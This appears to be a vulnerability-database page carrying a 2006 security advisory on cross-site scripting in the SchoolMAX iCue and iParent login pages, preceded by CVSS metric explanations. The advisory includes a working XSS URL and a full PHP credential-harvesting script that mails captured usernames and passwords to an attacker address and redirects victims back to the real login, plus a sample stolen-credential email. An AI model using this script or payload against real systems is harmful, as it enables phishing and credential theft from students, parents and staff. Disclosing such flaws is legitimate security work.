The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The InfoGuard Group Vulnerability Summary 2006-04
Application: Maximus' iCue and iParent (http://www.schoolmax.net)
Versions: All
Bugs: Cross-Site Scripting (XSS)
Date: 18 June 2006
Author: Charles H.
E-mail: charles (at) infoguardgroup (dot) com [email concealed]
Website: http://www.infoguardgroup.com
1) Introduction
SchoolMAX from MAXIMUS is one of the most technologically advanced
student information systems available today. It is district-based yet
still provides for school-based management capabilities and controls.
http://www.maximus.com/corporate/pages/SchoolMAX.asp
2)Login XSS
The login.asp file assocaited with SchoolMAX's iCue and iParent applications
suffers from a Cross-Site Scripting flaw. This can result in cookie and/or
credentials theft, especially if used in conjunction with a social
engineering attack. A simple attack against iCue might look like this::
https://icue.victimsite.us/toas/icue_login.asp?error_msg=These%20aren't%
20the%20droids%20you're%20looking%20for
This will result in the message "These aren't the droids you're looking
for" being displayed.
This shows the basic idea of the XSS. You can perform various
obfuscation techniques to hide the message.
Additionally, when used in conjunction with social engineering,user
credentials can be easily obtained.:
If we take a php file like this:
<?php
$my_email = "h@x0r (at) evil (dot) net [email concealed]";
$header =
"https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_
login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR=
";
if ($_SERVER['REQUEST_METHOD'] != "POST"){exit;}
$disallowed_name = array(':',';',"'",'"','=','(',')','{','}','@');
foreach($disallowed_name as $value)
{
if(stristr($_POST[Name],$value)){header("location:
$_SERVER[HTTP_REFERER]");exit;}
}
$disallowed_email = array(':',';',"'",'"','=','(',')','{','}');
foreach($disallowed_email as $value)
{
if(stristr($_POST[Email],$value)){header("location:
$_SERVER[HTTP_REFERER]");exit;}
}
$message = "";
while(list($key,$value) =
each($_POST)){if(!(empty($value))){$set=1;}$message = $message . "$key:
$valuenn";} if($set!==1){header("location: $_SERVER[HTTP_REFERER]");exit;}
$message = $message . "-- nThank you for exploiting iParent";
$message = stripslashes($message);
$subject = "FormToEmail Comments";
$headers = "From: " . $_POST['Email'] . "n" . "Return-Path: " .
$_POST['Email'] . "n" . "Reply-To: " . $_POST['Email'] . "n";
mail($my_email,$subject,$message,$headers);
header( "Location:
https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_l
ogin=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR="
);
?>
Post it to some place, then send a forged e-mail which redirects to
this, we can capture the credentials. When we do,
here's what the attacker gets in the e-mail:
Subject: FormToEmail Comments
Date: Mon, 06 Mar 2006 21:48:05 -0900 (AKST)
From: Nobody <nobody (at) victimsite (dot) us [email concealed]>
To: Badguy (at) evil (dot) net [email concealed]
DST_NBR: 1111
USER_NME: 4564654
OPER_PASS: 123456
login: Log in
4)Patch Status
Maximus has been contacted multiple times since this issue was
discovered in March. To date, they have not responded.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iQEVAwUBRJUVPgt0Y4479LtgAQK5yQf/QYCmo/Tel9z9Aank1y3tJUSv/rmAnLNB
UxNOGXIflr7cofVncuoXqLq2oI9KGn04QeYafj13+c+42t5KJRHG/Vw8Y0XrWq9b
hMf+BXkIXq7QCjuyP6HUSpt7j6PmI1FYiidxcL5Y3NmNuChRI4m1akeWIjt55TMp
OxflWcP3kgnUNT6CSbXKwOzXw9dL+TBlNQfhbQ5fDNIhrghkC4Ar/ivDnHo1qrkS
Ie6xi7ahT56418W3LaToPnJA1S5ggIvDSpmxKRDO2yU8r0d+bntcSMYQESSwUbAe
sVUNKcWP8RKXmQy7Mf+2BDZJNesCvKZ/Hu9OSOH96ikHL9OIC/iIxQ==
=ZBTh
-----END PGP SIGNATURE-----
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum